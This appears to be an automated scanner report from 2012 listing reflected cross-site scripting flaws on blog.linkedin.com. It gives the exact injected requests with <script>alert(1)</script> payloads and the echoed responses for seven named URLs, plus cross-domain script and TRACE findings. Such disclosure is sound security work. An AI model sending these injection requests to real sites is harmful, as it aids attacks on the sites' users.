Report generated by XSS.Cx at Wed Aug 08 11:02:14 EDT 2012.

XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, blog.linkedin.com

Loading

1. Cross-site scripting (reflected)

1.1. http://blog.linkedin.com/2011/01/25/linkedin-swarm/ [name of an arbitrarily supplied request parameter]

1.2. http://blog.linkedin.com/2011/01/26/linkedin-promotions-data/ [name of an arbitrarily supplied request parameter]

1.3. http://blog.linkedin.com/2011/12/22/linkedin-today-2011/ [name of an arbitrarily supplied request parameter]

1.4. http://blog.linkedin.com/2011/12/23/linkedin-blog-2011/ [name of an arbitrarily supplied request parameter]

1.5. http://blog.linkedin.com/wp-content/plugins/slideshow-gallery/css/gallery-css.php [background parameter]

1.6. http://blog.linkedin.com/wp-content/plugins/slideshow-gallery/css/gallery-css.php [infobackground parameter]

1.7. http://blog.linkedin.com/wp-content/plugins/slideshow-gallery/css/gallery-css.php [infocolor parameter]

2. Cross-domain script include

2.1. http://blog.linkedin.com/2011/01/25/linkedin-swarm/

2.2. http://blog.linkedin.com/2011/01/26/linkedin-promotions-data/

2.3. http://blog.linkedin.com/2011/12/22/linkedin-today-2011/

2.4. http://blog.linkedin.com/2011/12/23/linkedin-blog-2011/

3. TRACE method is enabled

4. Robots.txt file



1. Cross-site scripting (reflected)  next
There are 7 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organization. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organization which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organization in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://blog.linkedin.com/2011/01/25/linkedin-swarm/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.linkedin.com
Path:   /2011/01/25/linkedin-swarm/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12740"><script>alert(1)</script>89ac18eef71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12740\"><script>alert(1)</script>89ac18eef71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/25/linkedin-swarm/?12740"><script>alert(1)</script>89ac18eef71=1 HTTP/1.1
Host: blog.linkedin.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://swarm.linkedinlabs.com/
Cookie: bcookie="v=2&0eecd04a-318f-4bd6-95aa-31d2dece8fb9"; __utma=23068709.328184121.1323156109.1323156109.1323156109.1; __utmz=23068709.1323156109.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-262410866-1323155751711; lang="v=2&lang=en&c="
Content-Length: 10


Response

HTTP/1.1 200 OK
Served-By: Joyent
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sun, 08 Jan 2012 02:40:08 GMT
X-Pingback: http://blog.linkedin.com/xmlrpc.php
Link: <http://blog.linkedin.com/?p=5967>; rel=shortlink
Connection: Keep-Alive
Content-Length: 31521

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://gmpg.org/xfn/11">
<title>The LinkedIn Blog &raquo; LinkedIn is ...buzzing... with activi
...[SNIP]...
<script type="IN/Share" data-url="http://blog.linkedin.com/2011/01/25/linkedin-swarm/?12740\"><script>alert(1)</script>89ac18eef71=1" data-counter="top">
...[SNIP]...

1.2. http://blog.linkedin.com/2011/01/26/linkedin-promotions-data/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.linkedin.com
Path:   /2011/01/26/linkedin-promotions-data/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfe62"><script>alert(1)</script>b8df7e49736 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dfe62\"><script>alert(1)</script>b8df7e49736 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/26/linkedin-promotions-data/?dfe62"><script>alert(1)</script>b8df7e49736=1 HTTP/1.1
Host: blog.linkedin.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://blog.linkedin.com/2011/01/25/linkedin-swarm/
X-Moz: prefetch
Cookie: bcookie="v=2&0eecd04a-318f-4bd6-95aa-31d2dece8fb9"; __utma=23068709.328184121.1323156109.1323156109.1323156109.1; __utmz=23068709.1323156109.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-262410866-1323155751711; lang="v=2&lang=en&c="
Content-Length: 10


Response

HTTP/1.1 200 OK
Served-By: Joyent
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sun, 08 Jan 2012 02:40:20 GMT
X-Pingback: http://blog.linkedin.com/xmlrpc.php
Link: <http://blog.linkedin.com/?p=5991>; rel=shortlink
Connection: Keep-Alive
Content-Length: 34689

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://gmpg.org/xfn/11">
<title>The LinkedIn Blog &raquo; Level Up! How Millennials are Changin
...[SNIP]...
<script type="IN/Share" data-url="http://blog.linkedin.com/2011/01/26/linkedin-promotions-data/?dfe62\"><script>alert(1)</script>b8df7e49736=1" data-counter="top">
...[SNIP]...

1.3. http://blog.linkedin.com/2011/12/22/linkedin-today-2011/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.linkedin.com
Path:   /2011/12/22/linkedin-today-2011/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2aea"><script>alert(1)</script>e00d868ac19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b2aea\"><script>alert(1)</script>e00d868ac19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/12/22/linkedin-today-2011/?b2aea"><script>alert(1)</script>e00d868ac19=1 HTTP/1.1
Host: blog.linkedin.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://blog.linkedin.com/2011/01/25/linkedin-swarm/
Cookie: bcookie="v=2&0eecd04a-318f-4bd6-95aa-31d2dece8fb9"; __utma=23068709.328184121.1323156109.1323156109.1323156109.1; __utmz=23068709.1323156109.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-262410866-1323155751711; lang="v=2&lang=en&c="
Content-Length: 10


Response

HTTP/1.1 200 OK
Served-By: Joyent
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sun, 08 Jan 2012 02:41:18 GMT
X-Pingback: http://blog.linkedin.com/xmlrpc.php
Link: <http://blog.linkedin.com/?p=8733>; rel=shortlink
Connection: Keep-Alive
Content-Length: 21354

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://gmpg.org/xfn/11">
<title>The LinkedIn Blog &raquo; The Most Popular Stories on LinkedIn
...[SNIP]...
<script type="IN/Share" data-url="http://blog.linkedin.com/2011/12/22/linkedin-today-2011/?b2aea\"><script>alert(1)</script>e00d868ac19=1" data-counter="top">
...[SNIP]...

1.4. http://blog.linkedin.com/2011/12/23/linkedin-blog-2011/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.linkedin.com
Path:   /2011/12/23/linkedin-blog-2011/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44950"><script>alert(1)</script>8cdfd362591 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 44950\"><script>alert(1)</script>8cdfd362591 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/12/23/linkedin-blog-2011/?44950"><script>alert(1)</script>8cdfd362591=1 HTTP/1.1
Host: blog.linkedin.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://blog.linkedin.com/2011/12/22/linkedin-today-2011/
X-Moz: prefetch
Cookie: bcookie="v=2&0eecd04a-318f-4bd6-95aa-31d2dece8fb9"; __utma=23068709.328184121.1323156109.1323156109.1323156109.1; __utmz=23068709.1323156109.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-262410866-1323155751711; lang="v=2&lang=en&c="
Content-Length: 10


Response

HTTP/1.1 200 OK
Served-By: Joyent
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sun, 08 Jan 2012 02:41:27 GMT
X-Pingback: http://blog.linkedin.com/xmlrpc.php
Link: <http://blog.linkedin.com/?p=8740>; rel=shortlink
Connection: Keep-Alive
Content-Length: 25593

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://gmpg.org/xfn/11">
<title>The LinkedIn Blog &raquo; LinkedIn&#8217;s Year 2011 in Picture
...[SNIP]...
<script type="IN/Share" data-url="http://blog.linkedin.com/2011/12/23/linkedin-blog-2011/?44950\"><script>alert(1)</script>8cdfd362591=1" data-counter="top">
...[SNIP]...

1.5. http://blog.linkedin.com/wp-content/plugins/slideshow-gallery/css/gallery-css.php [background parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.linkedin.com
Path:   /wp-content/plugins/slideshow-gallery/css/gallery-css.php

Issue detail

The value of the background request parameter is copied into the HTML document as plain text between tags. The payload f303a<script>alert(1)</script>2bffe30da4d was submitted in the background parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/slideshow-gallery/css/gallery-css.php?1=1&width=520&height=360&border=1px+solid+%23CCCCCC&background=%23000000f303a<script>alert(1)</script>2bffe30da4d&infobackground=%23000000&infocolor=%23FFFFFF&resizeimages=Y&ver=1.0 HTTP/1.1
Host: blog.linkedin.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Accept: text/css,*/*;q=0.1
Referer: http://blog.linkedin.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=2&b73885b7-ceba-480e-af6a-ec2e41d721f2"; __qca=P0-1895014713-1323400949324; __utma=23068709.1871059675.1325989353.1325989353.1325989353.1; __utmb=23068709.20.10.1325989353; __utmc=23068709; __utmz=23068709.1325989353.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=23068709.guest; lang="v=2&lang=en&c="
Content-Length: 10


Response

HTTP/1.1 200 OK
Served-By: Joyent
Server: Apache
Vary: Accept-Encoding
Content-Type: text/css;charset=UTF-8
Date: Sun, 08 Jan 2012 02:26:34 GMT
Connection: Keep-Alive
Content-Length: 2450


                                   #slideshow { list-style:none !important; color:#fff; }
#slideshow span { display:none; }
#slideshow-wrapper { position:relative; width:500px; background:#000000f303a<script>alert(1)</script>2bffe30da4d; padding:2px; margin: 0 auto; display:none; }
#slideshow-wrapper * { margin:0; padding:0; }
#fullsize { position:relative; z-index:1; overflow:hidden; width:500px; height:320px; }
#information { fo
...[SNIP]...

1.6. http://blog.linkedin.com/wp-content/plugins/slideshow-gallery/css/gallery-css.php [infobackground parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.linkedin.com
Path:   /wp-content/plugins/slideshow-gallery/css/gallery-css.php

Issue detail

The value of the infobackground request parameter is copied into the HTML document as plain text between tags. The payload 26be2<script>alert(1)</script>43636c77d0f was submitted in the infobackground parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/slideshow-gallery/css/gallery-css.php?1=1&width=520&height=360&border=1px+solid+%23CCCCCC&background=%23000000&infobackground=%2300000026be2<script>alert(1)</script>43636c77d0f&infocolor=%23FFFFFF&resizeimages=Y&ver=1.0 HTTP/1.1
Host: blog.linkedin.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Accept: text/css,*/*;q=0.1
Referer: http://blog.linkedin.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=2&b73885b7-ceba-480e-af6a-ec2e41d721f2"; __qca=P0-1895014713-1323400949324; __utma=23068709.1871059675.1325989353.1325989353.1325989353.1; __utmb=23068709.20.10.1325989353; __utmc=23068709; __utmz=23068709.1325989353.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=23068709.guest; lang="v=2&lang=en&c="
Content-Length: 10


Response

HTTP/1.1 200 OK
Served-By: Joyent
Server: Apache
Vary: Accept-Encoding
Content-Type: text/css;charset=UTF-8
Date: Sun, 08 Jan 2012 02:26:37 GMT
Connection: Keep-Alive
Content-Length: 2368


                                   #slideshow { list-style:none !important; color:#fff; }
#slideshow span { display:none; }
#slideshow-wrapper { position:relative; width:500px; background:#000000; padding:2px; margin: 0
...[SNIP]...
ve; z-index:1; overflow:hidden; width:500px; height:320px; }
#information { font-family: Arial, Helvetica, sans-serif !important; position:absolute; bottom:0; width:500px; height:0; background:#00000026be2<script>alert(1)</script>43636c77d0f; color:#FFFFFF; overflow:hidden; z-index:200; opacity:.7; filter:alpha(opacity=70); }
#information h3 { color:#FFFFFF; padding:4px 8px 3px; margin:0 !important; font-size:16px; font-weight:bold; }
#
...[SNIP]...

1.7. http://blog.linkedin.com/wp-content/plugins/slideshow-gallery/css/gallery-css.php [infocolor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.linkedin.com
Path:   /wp-content/plugins/slideshow-gallery/css/gallery-css.php

Issue detail

The value of the infocolor request parameter is copied into the HTML document as plain text between tags. The payload 64271<script>alert(1)</script>74b2636ac13 was submitted in the infocolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/slideshow-gallery/css/gallery-css.php?1=1&width=520&height=360&border=1px+solid+%23CCCCCC&background=%23000000&infobackground=%23000000&infocolor=%23FFFFFF64271<script>alert(1)</script>74b2636ac13&resizeimages=Y&ver=1.0 HTTP/1.1
Host: blog.linkedin.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Accept: text/css,*/*;q=0.1
Referer: http://blog.linkedin.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=2&b73885b7-ceba-480e-af6a-ec2e41d721f2"; __qca=P0-1895014713-1323400949324; __utma=23068709.1871059675.1325989353.1325989353.1325989353.1; __utmb=23068709.20.10.1325989353; __utmc=23068709; __utmz=23068709.1325989353.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=23068709.guest; lang="v=2&lang=en&c="
Content-Length: 10


Response

HTTP/1.1 200 OK
Served-By: Joyent
Server: Apache
Vary: Accept-Encoding
Content-Type: text/css;charset=UTF-8
Date: Sun, 08 Jan 2012 02:26:39 GMT
Connection: Keep-Alive
Content-Length: 2450


                                   #slideshow { list-style:none !important; color:#fff; }
#slideshow span { display:none; }
#slideshow-wrapper { position:relative; width:500px; background:#000000; padding:2px; margin: 0
...[SNIP]...
overflow:hidden; width:500px; height:320px; }
#information { font-family: Arial, Helvetica, sans-serif !important; position:absolute; bottom:0; width:500px; height:0; background:#000000; color:#FFFFFF64271<script>alert(1)</script>74b2636ac13; overflow:hidden; z-index:200; opacity:.7; filter:alpha(opacity=70); }
#information h3 { color:#FFFFFF64271<script>
...[SNIP]...

2. Cross-domain script include  previous  next
There are 4 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfill, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


2.1. http://blog.linkedin.com/2011/01/25/linkedin-swarm/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.linkedin.com
Path:   /2011/01/25/linkedin-swarm/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011/01/25/linkedin-swarm/ HTTP/1.1
Host: blog.linkedin.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://swarm.linkedinlabs.com/
Cookie: bcookie="v=2&0eecd04a-318f-4bd6-95aa-31d2dece8fb9"; __utma=23068709.328184121.1323156109.1323156109.1323156109.1; __utmz=23068709.1323156109.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-262410866-1323155751711; lang="v=2&lang=en&c="
Content-Length: 10


Response

HTTP/1.1 200 OK
Served-By: Joyent
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sun, 08 Jan 2012 02:38:55 GMT
X-Pingback: http://blog.linkedin.com/xmlrpc.php
Link: <http://blog.linkedin.com/?p=5967>; rel=shortlink
Connection: Keep-Alive
Content-Length: 30844

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://gmpg.org/xfn/11">
<title>The LinkedIn Blog &raquo; LinkedIn is ...buzzing... with activi
...[SNIP]...
</a><script type="text/javascript" src="//platform.twitter.com/widgets.js"></script>
...[SNIP]...

2.2. http://blog.linkedin.com/2011/01/26/linkedin-promotions-data/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.linkedin.com
Path:   /2011/01/26/linkedin-promotions-data/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011/01/26/linkedin-promotions-data/ HTTP/1.1
Host: blog.linkedin.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://blog.linkedin.com/2011/01/25/linkedin-swarm/
X-Moz: prefetch
Cookie: bcookie="v=2&0eecd04a-318f-4bd6-95aa-31d2dece8fb9"; __utma=23068709.328184121.1323156109.1323156109.1323156109.1; __utmz=23068709.1323156109.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-262410866-1323155751711; lang="v=2&lang=en&c="
Content-Length: 10


Response

HTTP/1.1 200 OK
Served-By: Joyent
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sun, 08 Jan 2012 02:39:04 GMT
X-Pingback: http://blog.linkedin.com/xmlrpc.php
Link: <http://blog.linkedin.com/?p=5991>; rel=shortlink
Connection: Keep-Alive
Content-Length: 34192

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://gmpg.org/xfn/11">
<title>The LinkedIn Blog &raquo; Level Up! How Millennials are Changin
...[SNIP]...
</a><script type="text/javascript" src="//platform.twitter.com/widgets.js"></script>
...[SNIP]...

2.3. http://blog.linkedin.com/2011/12/22/linkedin-today-2011/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.linkedin.com
Path:   /2011/12/22/linkedin-today-2011/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011/12/22/linkedin-today-2011/ HTTP/1.1
Host: blog.linkedin.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://blog.linkedin.com/2011/01/25/linkedin-swarm/
Cookie: bcookie="v=2&0eecd04a-318f-4bd6-95aa-31d2dece8fb9"; __utma=23068709.328184121.1323156109.1323156109.1323156109.1; __utmz=23068709.1323156109.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-262410866-1323155751711; lang="v=2&lang=en&c="
Content-Length: 10


Response

HTTP/1.1 200 OK
Served-By: Joyent
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sun, 08 Jan 2012 02:40:01 GMT
X-Pingback: http://blog.linkedin.com/xmlrpc.php
Link: <http://blog.linkedin.com/?p=8733>; rel=shortlink
Connection: Keep-Alive
Content-Length: 21307

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://gmpg.org/xfn/11">
<title>The LinkedIn Blog &raquo; The Most Popular Stories on LinkedIn
...[SNIP]...
</a><script type="text/javascript" src="//platform.twitter.com/widgets.js"></script>
...[SNIP]...

2.4. http://blog.linkedin.com/2011/12/23/linkedin-blog-2011/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.linkedin.com
Path:   /2011/12/23/linkedin-blog-2011/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2011/12/23/linkedin-blog-2011/ HTTP/1.1
Host: blog.linkedin.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://blog.linkedin.com/2011/12/22/linkedin-today-2011/
X-Moz: prefetch
Cookie: bcookie="v=2&0eecd04a-318f-4bd6-95aa-31d2dece8fb9"; __utma=23068709.328184121.1323156109.1323156109.1323156109.1; __utmz=23068709.1323156109.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-262410866-1323155751711; lang="v=2&lang=en&c="
Content-Length: 10


Response

HTTP/1.1 200 OK
Served-By: Joyent
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sun, 08 Jan 2012 02:40:12 GMT
X-Pingback: http://blog.linkedin.com/xmlrpc.php
Link: <http://blog.linkedin.com/?p=8740>; rel=shortlink
Connection: Keep-Alive
Content-Length: 25546

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://gmpg.org/xfn/11">
<title>The LinkedIn Blog &raquo; LinkedIn&#8217;s Year 2011 in Picture
...[SNIP]...
</a><script type="text/javascript" src="//platform.twitter.com/widgets.js"></script>
...[SNIP]...

3. TRACE method is enabled  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.linkedin.com
Path:   /

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behavior is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

Request

TRACE / HTTP/1.0
Host: blog.linkedin.com
Cookie: 1d239836d1d03552

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: message/http
Date: Sun, 08 Jan 2012 02:25:16 GMT
Connection: close

TRACE / HTTP/1.0
X-Forwarded-For: 174.36.218.2
Host: blog.linkedin.com
X-Cluster-Client-Ip: 174.36.218.2
Cookie: 1d239836d1d03552
Connection: Keep-Alive


4. Robots.txt file  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.linkedin.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honor the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorized access.

Request

GET /robots.txt HTTP/1.0
Host: blog.linkedin.com

Response

HTTP/1.0 200 OK
Served-By: Joyent
Server: Apache
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
Date: Sun, 08 Jan 2012 02:25:18 GMT
X-Pingback: http://blog.linkedin.com/xmlrpc.php
Connection: close
Content-Length: 24

User-agent: *
Disallow:

Report generated by XSS.Cx at Wed Aug 08 11:02:14 EDT 2012.